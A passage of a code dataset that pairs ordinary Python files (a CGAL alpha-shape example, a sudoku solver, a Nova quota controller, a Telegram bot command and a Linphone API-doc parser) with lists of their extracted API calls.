\"examples.configs.LocalDockerConfig\",\n \"logging.getLogger\",\n \"needlestack.servicers.factory.create_zookeeper_cluster_manager\",\n \"needlestack.servicers.merger.MergerServicer\",\n \"grpc_health.v1.health.HealthServicer\",\n \"needlestack.servicers.factory.serve\",\n \"needlestack.servicers.factory.create_server\",\n \"grpc_health.v1.health_pb2_grpc.add_HealthServicer_to_server\"\n]"},"extract_api":{"kind":"string","value":"[((369, 396), 'examples.configs.LocalDockerConfig', 'configs.LocalDockerConfig', ([], {}), '()\\n', (394, 396), False, 'from examples import configs\\n'), ((411, 440), 'needlestack.servicers.factory.create_server', 'factory.create_server', (['config'], {}), '(config)\\n', (432, 440), False, 'from needlestack.servicers import factory\\n'), ((455, 503), 'needlestack.servicers.factory.create_zookeeper_cluster_manager', 'factory.create_zookeeper_cluster_manager', (['config'], {}), '(config)\\n', (495, 503), False, 'from needlestack.servicers import factory\\n'), ((634, 650), 'grpc_health.v1.health.HealthServicer', 'HealthServicer', ([], {}), '()\\n', (648, 650), False, 'from grpc_health.v1.health import HealthServicer\\n'), ((655, 715), 'grpc_health.v1.health_pb2_grpc.add_HealthServicer_to_server', 'health_pb2_grpc.add_HealthServicer_to_server', (['health', 'server'], {}), '(health, server)\\n', (699, 715), False, 'from grpc_health.v1 import health_pb2, health_pb2_grpc\\n'), ((786, 807), 'needlestack.servicers.factory.serve', 'factory.serve', (['server'], {}), '(server)\\n', (799, 807), False, 'from needlestack.servicers import factory\\n'), ((298, 324), 'logging.getLogger', 'logging.getLogger', (['\"\"\"kazoo\"\"\"'], {}), \"('kazoo')\\n\", (315, 324), False, 'import logging\\n'), ((579, 610), 'needlestack.servicers.merger.MergerServicer', 'MergerServicer', (['config', 'manager'], {}), '(config, manager)\\n', (593, 610), False, 'from needlestack.servicers.merger import MergerServicer\\n')]"}}},{"rowIdx":709,"cells":{"code":{"kind":"string","value":"from CGAL.CGAL_Kernel import Point_2\nfrom CGAL.CGAL_Kernel import Weighted_point_2\nfrom CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2\nfrom CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2\nfrom CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2_Face_handle\nfrom CGAL.CGAL_Alpha_shape_2 import GENERAL, EXTERIOR, SINGULAR, REGULAR, INTERIOR\nfrom CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2_Vertex_handle\nfrom CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2_Face_handle\nfrom CGAL.CGAL_Alpha_shape_2 import Face_Interval_3\n\n\nlst = []\nlst.append(Point_2(0, 0))\nlst.append(Point_2(0, 4))\nlst.append(Point_2(44, 0))\nlst.append(Point_2(44, 5))\nlst.append(Point_2(444, 51))\nlst.append(Point_2(14, 1))\n\nt = Alpha_shape_2(lst, 0, GENERAL)\nt2 = Alpha_shape_2(lst, 0)\nt.clear()\nt.make_alpha_shape(lst)\n\n\nfor d in t.alpha():\n print(d)\n\n\nfor v in t.finite_vertices():\n type = t.classify(v)\n print(v.get_range()[0])\n\n if type == INTERIOR:\n print(\"INTERIOR\")\n elif type == SINGULAR:\n print(\"SINGULAR\")\n elif type == REGULAR:\n print(\"REGULAR\")\n elif type == EXTERIOR:\n print(\"EXTERIOR\")\n\n\nfor f in t.finite_faces():\n i = f.get_ranges(0)\n print(i.first)\n print(i.second)\n print(i.third)\n\n\nwas = Weighted_alpha_shape_2()\nlst_wp = []\nlst_wp.append(Weighted_point_2(Point_2(0, 0), 1))\nlst_wp.append(Weighted_point_2(Point_2(0, 4), 1))\nlst_wp.append(Weighted_point_2(Point_2(44, 0), 1))\nlst_wp.append(Weighted_point_2(Point_2(44, 5), 1))\nlst_wp.append(Weighted_point_2(Point_2(444, 51), 1))\nlst_wp.append(Weighted_point_2(Point_2(14, 1), 1))\n\nwas.make_alpha_shape(lst_wp)\n"},"apis":{"kind":"list like","value":["CGAL.CGAL_Kernel.Point_2","CGAL.CGAL_Alpha_shape_2.Alpha_shape_2","CGAL.CGAL_Alpha_shape_2.Weighted_alpha_shape_2"],"string":"[\n \"CGAL.CGAL_Kernel.Point_2\",\n \"CGAL.CGAL_Alpha_shape_2.Alpha_shape_2\",\n \"CGAL.CGAL_Alpha_shape_2.Weighted_alpha_shape_2\"\n]"},"extract_api":{"kind":"string","value":"[((702, 732), 'CGAL.CGAL_Alpha_shape_2.Alpha_shape_2', 'Alpha_shape_2', (['lst', '(0)', 'GENERAL'], {}), '(lst, 0, GENERAL)\\n', (715, 732), False, 'from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2\\n'), ((738, 759), 'CGAL.CGAL_Alpha_shape_2.Alpha_shape_2', 'Alpha_shape_2', (['lst', '(0)'], {}), '(lst, 0)\\n', (751, 759), False, 'from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2\\n'), ((1242, 1266), 'CGAL.CGAL_Alpha_shape_2.Weighted_alpha_shape_2', 'Weighted_alpha_shape_2', ([], {}), '()\\n', (1264, 1266), False, 'from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2\\n'), ((546, 559), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(0)'], {}), '(0, 0)\\n', (553, 559), False, 'from CGAL.CGAL_Kernel import Point_2\\n'), ((572, 585), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(4)'], {}), '(0, 4)\\n', (579, 585), False, 'from CGAL.CGAL_Kernel import Point_2\\n'), ((598, 612), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(0)'], {}), '(44, 0)\\n', (605, 612), False, 'from CGAL.CGAL_Kernel import Point_2\\n'), ((625, 639), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(5)'], {}), '(44, 5)\\n', (632, 639), False, 'from CGAL.CGAL_Kernel import Point_2\\n'), ((652, 668), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(444)', '(51)'], {}), '(444, 51)\\n', (659, 668), False, 'from CGAL.CGAL_Kernel import Point_2\\n'), ((681, 695), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(14)', '(1)'], {}), '(14, 1)\\n', (688, 695), False, 'from CGAL.CGAL_Kernel import Point_2\\n'), ((1310, 1323), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(0)'], {}), '(0, 0)\\n', (1317, 1323), False, 'from CGAL.CGAL_Kernel import Point_2\\n'), ((1360, 1373), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(0)', '(4)'], {}), '(0, 4)\\n', (1367, 1373), False, 'from CGAL.CGAL_Kernel import Point_2\\n'), ((1410, 1424), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(0)'], {}), '(44, 0)\\n', (1417, 1424), False, 'from CGAL.CGAL_Kernel import Point_2\\n'), ((1461, 1475), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(44)', '(5)'], {}), '(44, 5)\\n', (1468, 1475), False, 'from CGAL.CGAL_Kernel import Point_2\\n'), ((1512, 1528), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(444)', '(51)'], {}), '(444, 51)\\n', (1519, 1528), False, 'from CGAL.CGAL_Kernel import Point_2\\n'), ((1565, 1579), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(14)', '(1)'], {}), '(14, 1)\\n', (1572, 1579), False, 'from CGAL.CGAL_Kernel import Point_2\\n')]"}}},{"rowIdx":710,"cells":{"code":{"kind":"string","value":"import scene \n\nclass MyScene(scene.Scene):\n def setup(self):\n self.label_node = scene.LabelNode('A',\n position=(100,400), parent=self)\n self.start_flag = False\n \n def update(self):\n if self.start_flag:\n x,y = self.label_node.position\n if x < 340:\n self.label_node.position = (x+2, y)\n else:\n self.start_flag = False\n \n def touch_ended(self, touch):\n self.start_flag = True\n\nscene.run(MyScene())\n"},"apis":{"kind":"list like","value":["scene.LabelNode"],"string":"[\n \"scene.LabelNode\"\n]"},"extract_api":{"kind":"string","value":"[((91, 145), 'scene.LabelNode', 'scene.LabelNode', (['\"\"\"A\"\"\"'], {'position': '(100, 400)', 'parent': 'self'}), \"('A', position=(100, 400), parent=self)\\n\", (106, 145), False, 'import scene\\n')]"}}},{"rowIdx":711,"cells":{"code":{"kind":"string","value":"from bot.commands import BaseCommand\n\nimport mongo\n\n\nclass DisconnectCommand(BaseCommand):\n\n _COMMAND = 'disconnect'\n _DESCRIPTION = 'Close currently active chat.'\n _SUCCESS_MESSAGE = 'Disconnected from chat'\n\n def _callback(self, user, _bot, update, **kwargs):\n return self._call(user, _bot, update, **kwargs)\n\n def _call(self, user, _bot, update, **kwargs):\n chat = mongo.chats.get_active_chat_by_telegram_id(user.id)\n if chat:\n mongo.chats.disable_chat(chat['_id'])\n return True\n\n _bot.send_message(\n user.id,\n 'You are not connected to any vk user',\n )\n return False\n"},"apis":{"kind":"list like","value":["mongo.chats.get_active_chat_by_telegram_id","mongo.chats.disable_chat"],"string":"[\n \"mongo.chats.get_active_chat_by_telegram_id\",\n \"mongo.chats.disable_chat\"\n]"},"extract_api":{"kind":"string","value":"[((397, 448), 'mongo.chats.get_active_chat_by_telegram_id', 'mongo.chats.get_active_chat_by_telegram_id', (['user.id'], {}), '(user.id)\\n', (439, 448), False, 'import mongo\\n'), ((478, 515), 'mongo.chats.disable_chat', 'mongo.chats.disable_chat', ([\"chat['_id']\"], {}), \"(chat['_id'])\\n\", (502, 515), False, 'import mongo\\n')]"}}},{"rowIdx":712,"cells":{"code":{"kind":"string","value":"import numpy as np\n\nboard = np.zeros(shape=(9, 9))\ncount = 0\n\n\ndef solve():\n global count\n count += 1\n if count % 1000 == 0:\n print('\\rCurrent number of computations made:', count, end='')\n freePos = find()\n if freePos is None:\n return True\n i = freePos[0]\n j = freePos[1]\n for w in range(1, 10):\n if possible(w, freePos):\n board[i][j] = w\n\n if solve():\n return True\n\n board[i][j] = 0\n\n return False\n\n\ndef find():\n for i in range(9):\n for j in range(9):\n if board[i][j] == 0:\n return [i, j]\n return None\n\n\ndef possible(value, position):\n # position = (i, j) tuple\n i = position[0]\n j = position[1]\n\n # checks row and column for repeat value\n if (value in board[:, j]) or (value in board[i]):\n return False\n\n # reset to i,j - top left square\n i = (i // 3) * 3\n j = (j // 3) * 3\n\n # check all squares in square\n for n in range(i, i + 3):\n for m in range(j, j + 3):\n if board[n][m] == value:\n return False\n return True\n\n\ndef change(position):\n # position = (i, j) tuple\n i = position[0]\n j = position[1]\n for w in range(1, 10):\n if w not in board[:, j] and w not in board[i]:\n board[i][j] = w\n return True\n return False\n\n\ndef initialize():\n print(\"Please enter the values on the board starting from left to right, top to bottom, 0 for blank\")\n integerChunk = input(\"Numbers: \")\n pos = 0\n for i in range(9):\n for j in range(9):\n board[i][j] = int(integerChunk[pos])\n pos += 1\n\n\ndef displayBoard():\n for i in range(3):\n for j in range(9):\n if board[i][j] == 0:\n print(\" \", end=\"\")\n else:\n print(\"%d \" % board[i][j], end=\"\")\n if (j == 2) or (j == 5):\n print(\"| \", end=\"\")\n if j == 8:\n print(\"\")\n print(\"- - - - - - - - - - -\")\n for i in range(3, 6):\n for j in range(9):\n if board[i][j] == 0:\n print(\" \", end=\"\")\n else:\n print(\"%d \" % board[i][j], end=\"\")\n if (j == 2) or (j == 5):\n print(\"| \", end=\"\")\n if j == 8:\n print(\"\")\n print(\"- - - - - - - - - - -\")\n for i in range(6, 9):\n for j in range(9):\n if board[i][j] == 0:\n print(\" \", end=\"\")\n else:\n print(\"%d \" % board[i][j], end=\"\")\n if (j == 2) or (j == 5):\n print(\"| \", end=\"\")\n if j == 8:\n print(\"\")\n\n\ndef main():\n initialize()\n print(\"Is this the correct board? Press enter to continue or 'q' to exit program.\")\n displayBoard()\n response = input()\n if response == \"q\":\n exit()\n print(\"---------------SOLVING---------------\\n\")\n solve()\n print(\"\\r\\rSOLUTION\")\n displayBoard()\n print(\"\\nTotal number of computations:\", count)\n\n\nif __name__ == \"__main__\":\n main()\n\n"},"apis":{"kind":"list like","value":["numpy.zeros"],"string":"[\n \"numpy.zeros\"\n]"},"extract_api":{"kind":"string","value":"[((28, 50), 'numpy.zeros', 'np.zeros', ([], {'shape': '(9, 9)'}), '(shape=(9, 9))\\n', (36, 50), True, 'import numpy as np\\n')]"}}},{"rowIdx":713,"cells":{"code":{"kind":"string","value":"# Copyright 2012 OpenStack Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nfrom nova.api.openstack import api_version_request\nfrom nova.api.openstack.api_version_request \\\n import MIN_WITHOUT_PROXY_API_SUPPORT_VERSION\nfrom nova.api.openstack import extensions\nfrom nova.api.openstack import wsgi\nfrom nova.policies import used_limits as ul_policies\nfrom nova import quota\n\n\nQUOTAS = quota.QUOTAS\n\n\nclass UsedLimitsController(wsgi.Controller):\n\n @staticmethod\n def _reserved(req):\n try:\n return int(req.GET['reserved'])\n except (ValueError, KeyError):\n return False\n\n @wsgi.extends\n @extensions.expected_errors(())\n def index(self, req, resp_obj):\n context = req.environ['nova.context']\n project_id = self._project_id(context, req)\n quotas = QUOTAS.get_project_quotas(context, project_id, usages=True)\n if api_version_request.is_supported(\n req, min_version=MIN_WITHOUT_PROXY_API_SUPPORT_VERSION):\n quota_map = {\n 'totalRAMUsed': 'ram',\n 'totalCoresUsed': 'cores',\n 'totalInstancesUsed': 'instances',\n 'totalServerGroupsUsed': 'server_groups',\n }\n else:\n quota_map = {\n 'totalRAMUsed': 'ram',\n 'totalCoresUsed': 'cores',\n 'totalInstancesUsed': 'instances',\n 'totalFloatingIpsUsed': 'floating_ips',\n 'totalSecurityGroupsUsed': 'security_groups',\n 'totalServerGroupsUsed': 'server_groups',\n }\n\n used_limits = {}\n for display_name, key in quota_map.items():\n if key in quotas:\n reserved = (quotas[key]['reserved']\n if self._reserved(req) else 0)\n used_limits[display_name] = quotas[key]['in_use'] + reserved\n\n resp_obj.obj['limits']['absolute'].update(used_limits)\n\n def _project_id(self, context, req):\n if 'tenant_id' in req.GET:\n tenant_id = req.GET.get('tenant_id')\n target = {\n 'project_id': tenant_id,\n 'user_id': context.user_id\n }\n context.can(ul_policies.BASE_POLICY_NAME, target)\n return tenant_id\n return context.project_id\n"},"apis":{"kind":"list like","value":["nova.api.openstack.extensions.expected_errors","nova.api.openstack.api_version_request.is_supported"],"string":"[\n \"nova.api.openstack.extensions.expected_errors\",\n \"nova.api.openstack.api_version_request.is_supported\"\n]"},"extract_api":{"kind":"string","value":"[((1173, 1203), 'nova.api.openstack.extensions.expected_errors', 'extensions.expected_errors', (['()'], {}), '(())\\n', (1199, 1203), False, 'from nova.api.openstack import extensions\\n'), ((1426, 1519), 'nova.api.openstack.api_version_request.is_supported', 'api_version_request.is_supported', (['req'], {'min_version': 'MIN_WITHOUT_PROXY_API_SUPPORT_VERSION'}), '(req, min_version=\\n MIN_WITHOUT_PROXY_API_SUPPORT_VERSION)\\n', (1458, 1519), False, 'from nova.api.openstack import api_version_request\\n')]"}}},{"rowIdx":714,"cells":{"code":{"kind":"string","value":"#!/usr/bin/python\n\n# Copyright (C) 2014 Belledonne Communications SARL\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\nimport argparse\nimport os\nimport six\nimport string\nimport sys\nimport xml.etree.ElementTree as ET\nimport xml.dom.minidom as minidom\nimport metadoc\n\n\nclass CObject:\n\tdef __init__(self, name):\n\t\tself.name = name.strip()\n\t\tself.briefDescription = ''\n\t\tself.detailedDescription = None\n\t\tself.deprecated = False\n\t\tself.briefDoc = None\n\n\nclass CEnumValue(CObject):\n\tdef __init__(self, name):\n\t\tCObject.__init__(self, name)\n\t\tself.value = None\n\n\nclass CEnum(CObject):\n\tdef __init__(self, name):\n\t\tCObject.__init__(self, name)\n\t\tself.values = []\n\t\tself.associatedTypedef = None\n\n\tdef addValue(self, value):\n\t\tself.values.append(value)\n\n\nclass CStructMember(CObject):\n\tdef __init__(self, name, t):\n\t\tCObject.__init__(self, name)\n\t\tself.ctype = t.strip()\n\n\nclass CStruct(CObject):\n\tdef __init__(self, name):\n\t\tCObject.__init__(self, name)\n\t\tself.members = []\n\t\tself.associatedTypedef = None\n\n\tdef addMember(self, member):\n\t\tself.members.append(member)\n\n\nclass CTypedef(CObject):\n\tdef __init__(self, name, definition):\n\t\tCObject.__init__(self, name)\n\t\tself.definition = definition.strip()\n\n\nclass CArgument(CObject):\n\tdef __init__(self, t, name = '', enums = [], structs = []):\n\t\tCObject.__init__(self, name)\n\t\tself.description = None\n\t\tself.containedType = None\n\t\tkeywords = [ 'const', 'struct', 'enum', 'signed', 'unsigned', 'short', 'long', '*' ]\n\t\tfullySplittedType = []\n\t\tsplittedType = t.strip().split(' ')\n\t\tfor s in splittedType:\n\t\t\tif s.startswith('*'):\n\t\t\t\tfullySplittedType.append('*')\n\t\t\t\tif len(s) > 1:\n\t\t\t\t\tfullySplittedType.append(s[1:])\n\t\t\telif s.endswith('*'):\n\t\t\t\tfullySplittedType.append(s[:-1])\n\t\t\t\tfullySplittedType.append('*')\n\t\t\telse:\n\t\t\t\tfullySplittedType.append(s)\n\t\tif 'MS2_DEPRECATED' in fullySplittedType:\n\t\t\tfullySplittedType.remove('MS2_DEPRECATED')\n\t\telif 'LINPHONE_DEPRECATED' in fullySplittedType:\n\t\t\tfullySplittedType.remove('LINPHONE_DEPRECATED')\n\t\tisStruct = False\n\t\tisEnum = False\n\t\tself.ctype = 'int' # Default to int so that the result is correct eg. for 'unsigned short'\n\t\tfor s in fullySplittedType:\n\t\t\tif not s in keywords:\n\t\t\t\tself.ctype = s\n\t\t\tif s == 'struct':\n\t\t\t\tisStruct = True\n\t\t\tif s == 'enum':\n\t\t\t\tisEnum = True\n\t\tif isStruct:\n\t\t\tfor st in structs:\n\t\t\t\tif st.associatedTypedef is not None:\n\t\t\t\t\tself.ctype = st.associatedTypedef.name\n\t\telif isEnum:\n\t\t\tfor e in enums:\n\t\t\t\tif e.associatedTypedef is not None:\n\t\t\t\t\tself.ctype = e.associatedTypedef.name\n\t\tif self.ctype == 'int' and 'int' not in fullySplittedType:\n\t\t\tif fullySplittedType[-1] == '*':\n\t\t\t\tfullySplittedType.insert(-1, 'int')\n\t\t\telse:\n\t\t\t\tfullySplittedType.append('int')\n\t\tself.completeType = ' '.join(fullySplittedType)\n\n\tdef __str__(self):\n\t\treturn self.completeType + \" \" + self.name\n\n\nclass CArgumentsList:\n\tdef __init__(self):\n\t\tself.arguments = []\n\n\tdef addArgument(self, arg):\n\t\tself.arguments.append(arg)\n\n\tdef __len__(self):\n\t\treturn len(self.arguments)\n\n\tdef __getitem__(self, key):\n\t\treturn self.arguments[key]\n\n\tdef __str__(self):\n\t\targstr = []\n\t\tfor arg in self.arguments:\n\t\t\targstr.append(str(arg))\n\t\treturn ', '.join(argstr)\n\n\nclass CFunction(CObject):\n\tdef __init__(self, name, returnarg, argslist):\n\t\tCObject.__init__(self, name)\n\t\tself.returnArgument = returnarg\n\t\tself.arguments = argslist\n\t\tself.location = None\n\n\nclass CEvent(CFunction):\n\tpass\n\n\nclass CProperty:\n\tdef __init__(self, name):\n\t\tself.name = name\n\t\tself.getter = None\n\t\tself.setter = None\n\n\nclass CClass(CObject):\n\tdef __init__(self, st):\n\t\tCObject.__init__(self, st.associatedTypedef.name)\n\t\tif st.deprecated or st.associatedTypedef.deprecated:\n\t\t\tself.deprecated = True\n\t\tif len(st.associatedTypedef.briefDescription) > 0:\n\t\t\tself.briefDescription = st.associatedTypedef.briefDescription\n\t\telif len(st.briefDescription) > 0:\n\t\t\tself.briefDescription = st.briefDescription\n\t\tif st.associatedTypedef.detailedDescription is not None:\n\t\t\tself.detailedDescription = st.associatedTypedef.detailedDescription\n\t\telif st.detailedDescription is not None:\n\t\t\tself.detailedDescription = st.detailedDescription\n\t\tself.__struct = st\n\t\tself.events = {}\n\t\tself.classMethods = {}\n\t\tself.instanceMethods = {}\n\t\tself.properties = {}\n\t\tself.__computeCFunctionPrefix()\n\n\tdef __computeCFunctionPrefix(self):\n\t\tself.cFunctionPrefix = ''\n\t\tfirst = True\n\t\tfor l in self.name:\n\t\t\tif l.isupper() and not first:\n\t\t\t\tself.cFunctionPrefix += '_'\n\t\t\tself.cFunctionPrefix += l.lower()\n\t\t\tfirst = False\n\t\tself.cFunctionPrefix += '_'\n\n\tdef __addPropertyGetter(self, name, f):\n\t\tif not name in self.properties:\n\t\t\tprop = CProperty(name)\n\t\t\tself.properties[name] = prop\n\t\tself.properties[name].getter = f\n\n\tdef __addPropertySetter(self, name, f):\n\t\tif not name in self.properties:\n\t\t\tprop = CProperty(name)\n\t\t\tself.properties[name] = prop\n\t\tself.properties[name].setter = f\n\n\tdef __addClassMethod(self, f):\n\t\tif not f.name in self.classMethods:\n\t\t\tself.classMethods[f.name] = f\n\n\tdef __addInstanceMethod(self, f):\n\t\tname = f.name[len(self.cFunctionPrefix):]\n\t\tif name.startswith('get_') and len(f.arguments) == 1:\n\t\t\tself.__addPropertyGetter(name[4:], f)\n\t\telif name.startswith('is_') and len(f.arguments) == 1 and f.returnArgument.ctype == 'bool_t':\n\t\t\tself.__addPropertyGetter(name, f)\n\t\telif name.endswith('_enabled') and len(f.arguments) == 1 and f.returnArgument.ctype == 'bool_t':\n\t\t\tself.__addPropertyGetter(name, f)\n\t\telif name.startswith('set_') and len(f.arguments) == 2:\n\t\t\tself.__addPropertySetter(name[4:], f)\n\t\telif name.startswith('enable_') and len(f.arguments) == 2 and f.arguments[1].ctype == 'bool_t':\n\t\t\tself.__addPropertySetter(name[7:] + '_enabled', f)\n\t\telse:\n\t\t\tif not f.name in self.instanceMethods:\n\t\t\t\tself.instanceMethods[f.name] = f\n\n\tdef addEvent(self, ev):\n\t\tif not ev.name in self.events:\n\t\t\tself.events[ev.name] = ev\n\n\tdef addMethod(self, f):\n\t\tif len(f.arguments) > 0 and f.arguments[0].ctype == self.name:\n\t\t\tself.__addInstanceMethod(f)\n\t\telse:\n\t\t\tself.__addClassMethod(f)\n\n\nclass Project:\n\tdef __init__(self):\n\t\tself.verbose = False\n\t\tself.prettyPrint = False\n\t\tself.enums = []\n\t\tself.__structs = []\n\t\tself.__typedefs = []\n\t\tself.__events = []\n\t\tself.__functions = []\n\t\tself.classes = []\n\t\tself.docparser = metadoc.Parser()\n\n\tdef add(self, elem):\n\t\tif isinstance(elem, CClass):\n\t\t\tif self.verbose:\n\t\t\t\tprint(\"Adding class \" + elem.name)\n\t\t\tself.classes.append(elem)\n\t\telif isinstance(elem, CEnum):\n\t\t\tif self.verbose:\n\t\t\t\tprint(\"Adding enum \" + elem.name)\n\t\t\t\tfor ev in elem.values:\n\t\t\t\t\tprint(\"\\t\" + ev.name)\n\t\t\tself.enums.append(elem)\n\t\telif isinstance(elem, CStruct):\n\t\t\tif self.verbose:\n\t\t\t\tprint(\"Adding struct \" + elem.name)\n\t\t\t\tfor sm in elem.members:\n\t\t\t\t\tprint(\"\\t\" + sm.ctype + \" \" + sm.name)\n\t\t\tself.__structs.append(elem)\n\t\telif isinstance(elem, CTypedef):\n\t\t\tif self.verbose:\n\t\t\t\tprint(\"Adding typedef \" + elem.name)\n\t\t\t\tprint(\"\\t\" + elem.definition)\n\t\t\tself.__typedefs.append(elem)\n\t\telif isinstance(elem, CEvent):\n\t\t\tif self.verbose:\n\t\t\t\tprint(\"Adding event \" + elem.name)\n\t\t\t\tprint(\"\\tReturns: \" + elem.returnArgument.ctype)\n\t\t\t\tprint(\"\\tArguments: \" + str(elem.arguments))\n\t\t\tself.__events.append(elem)\n\t\telif isinstance(elem, CFunction):\n\t\t\tif self.verbose:\n\t\t\t\tprint(\"Adding function \" + elem.name)\n\t\t\t\tprint(\"\\tReturns: \" + elem.returnArgument.ctype)\n\t\t\t\tprint(\"\\tArguments: \" + str(elem.arguments))\n\t\t\tself.__functions.append(elem)\n\n\tdef __cleanDescription(self, descriptionNode):\n\t\tfor para in descriptionNode.findall('./para'):\n\t\t\tfor n in para.findall('./parameterlist'):\n\t\t\t\tpara.remove(n)\n\t\t\tfor n in para.findall(\"./simplesect[@kind='return']\"):\n\t\t\t\tpara.remove(n)\n\t\t\tfor n in para.findall(\"./simplesect[@kind='see']\"):\n\t\t\t\tt = ''.join(n.itertext())\n\t\t\t\tn.clear()\n\t\t\t\tn.tag = 'see'\n\t\t\t\tn.text = t\n\t\t\tfor n in para.findall(\"./simplesect[@kind='note']\"):\n\t\t\t\tn.tag = 'note'\n\t\t\t\tn.attrib = {}\n\t\t\tfor n in para.findall(\".//xrefsect\"):\n\t\t\t\tpara.remove(n)\n\t\t\tfor n in para.findall('.//ref'):\n\t\t\t\tn.attrib = {}\n\t\t\tfor n in para.findall(\".//bctbx_list\"):\n\t\t\t\tpara.remove(n)\n\t\tif descriptionNode.tag == 'parameterdescription':\n\t\t\tdescriptionNode.tag = 'description'\n\t\tif descriptionNode.tag == 'simplesect':\n\t\t\tdescriptionNode.tag = 'description'\n\t\t\tdescriptionNode.attrib = {}\n\t\treturn descriptionNode\n\t\n\tdef __canBeWrapped(self, node):\n\t\treturn node.find('./detaileddescription//donotwrap') is None\n\n\tdef __discoverClasses(self):\n\t\tfor td in self.__typedefs:\n\t\t\tif td.definition.startswith('enum '):\n\t\t\t\tfor e in self.enums:\n\t\t\t\t\tif (e.associatedTypedef is None) and td.definition[5:] == e.name:\n\t\t\t\t\t\te.associatedTypedef = td\n\t\t\t\t\t\tbreak\n\t\t\telif td.definition.startswith('struct '):\n\t\t\t\tstructFound = False\n\t\t\t\tfor st in self.__structs:\n\t\t\t\t\tif (st.associatedTypedef is None) and td.definition[7:] == st.name:\n\t\t\t\t\t\tst.associatedTypedef = td\n\t\t\t\t\t\tstructFound = True\n\t\t\t\t\t\tbreak\n\t\t\t\tif not structFound:\n\t\t\t\t\tname = td.definition[7:]\n\t\t\t\t\tprint(\"Structure with no associated typedef: \" + name)\n\t\t\t\t\tst = CStruct(name)\n\t\t\t\t\tst.associatedTypedef = td\n\t\t\t\t\tself.add(st)\n\t\tfor td in self.__typedefs:\n\t\t\tif td.definition.startswith('struct '):\n\t\t\t\tfor st in self.__structs:\n\t\t\t\t\tif st.associatedTypedef == td:\n\t\t\t\t\t\tcclass = CClass(st)\n\t\t\t\t\t\tcclass.briefDoc = td.briefDoc\n\t\t\t\t\t\tself.add(cclass)\n\t\t\t\t\t\tbreak\n\t\t\telif ('Linphone' + td.definition) == td.name:\n\t\t\t\tst = CStruct(td.name)\n\t\t\t\tst.associatedTypedef = td\n\t\t\t\tcclass = CClass(st)\n\t\t\t\tcclass.briefDoc = td.briefDoc\n\t\t\t\tself.add(st)\n\t\t\t\tself.add(cclass)\n\t\t# Sort classes by length of name (longest first), so that methods are put in the right class\n\t\tself.classes.sort(key = lambda c: len(c.name), reverse = True)\n\t\tfor e in self.__events:\n\t\t\teventAdded = False\n\t\t\tfor c in self.classes:\n\t\t\t\tif c.name.endswith('Cbs') and e.name.startswith(c.name):\n\t\t\t\t\tc.addEvent(e)\n\t\t\t\t\teventAdded = True\n\t\t\t\t\tbreak\n\t\t\tif not eventAdded:\n\t\t\t\tfor c in self.classes:\n\t\t\t\t\tif e.name.startswith(c.name):\n\t\t\t\t\t\tc.addEvent(e)\n\t\t\t\t\t\teventAdded = True\n\t\t\t\t\t\tbreak\n\t\tfor f in self.__functions:\n\t\t\tfor c in self.classes:\n\t\t\t\tif c.cFunctionPrefix == f.name[0 : len(c.cFunctionPrefix)]:\n\t\t\t\t\tc.addMethod(f)\n\t\t\t\t\tbreak\n\n\tdef __parseCEnumValueInitializer(self, initializer):\n\t\tinitializer = initializer.strip()\n\t\tif not initializer.startswith('='):\n\t\t\treturn None\n\n\t\tinitializer = initializer[1:]\n\t\tinitializer.strip()\n\t\treturn initializer\n\n\tdef __parseCEnumValue(self, node):\n\t\tev = CEnumValue(node.find('./name').text)\n\t\tinitializerNode = node.find('./initializer')\n\t\tif initializerNode is not None:\n\t\t\tev.value = self.__parseCEnumValueInitializer(initializerNode.text)\n\n\t\tdeprecatedNode = node.find(\".//xrefsect[xreftitle='Deprecated']\")\n\t\tif deprecatedNode is not None:\n\t\t\tev.deprecated = True\n\t\tev.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()\n\t\tev.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))\n\t\tev.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))\n\t\treturn ev\n\n\tdef __parseCEnumMemberdef(self, node):\n\t\tif not Project.__canBeWrapped(self, node):\n\t\t\treturn None\n\t\te = CEnum(node.find('./name').text)\n\t\tdeprecatedNode = node.find(\".//xrefsect[xreftitle='Deprecated']\")\n\t\tif deprecatedNode is not None:\n\t\t\te.deprecated = True\n\t\te.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()\n\t\te.briefDoc = 